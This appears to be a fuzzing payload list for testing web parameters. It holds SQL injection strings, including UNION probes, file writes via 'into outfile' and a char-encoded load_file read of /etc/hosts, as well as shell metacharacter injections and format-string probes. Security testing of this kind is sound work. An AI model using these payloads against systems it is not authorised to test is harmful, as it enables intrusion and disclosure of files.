## this file contains tests for parameter-manipulation ## mainly for GET requests (means uri-encoding is possible) ## ## lets start with sql-injections ' " \ \ -- /* # REM ; ) char(39) chr(39) 11+AA X 1169 1169 1 or 6911=6911 A' or 6911=6911 6911(char(39)) 1 into outfile 'tstfil' 1 into outfile "tstfil" 1 or load_file(char(47,101,116,99,47,104,111,115,116,115)) 6911 union select 6911 6911 union select 6911 -- 6911 union select 6911 # 6911 union select 6911 /* 6911 union select 6911 6911 union select 6911 -- 6911 union select 6911 # 6911 union select 6911 /* 6911; select 6900+11 from dual; 6911; select 6900+11; ## we should cover mssql specific tasks from here ## metacharacters uri-encoded 6911%00 ;6911 |6911 !6911 &6911 &&6911 6911%04 %0a6911 %0d6911 %1b6911 6911%08%08%08%08 6911%7f%7f%7f%7f ~ `6911` %606911%60 ## simple overflow 6911 %s%x%s%x %25s%25x%25s%25x ## unicode things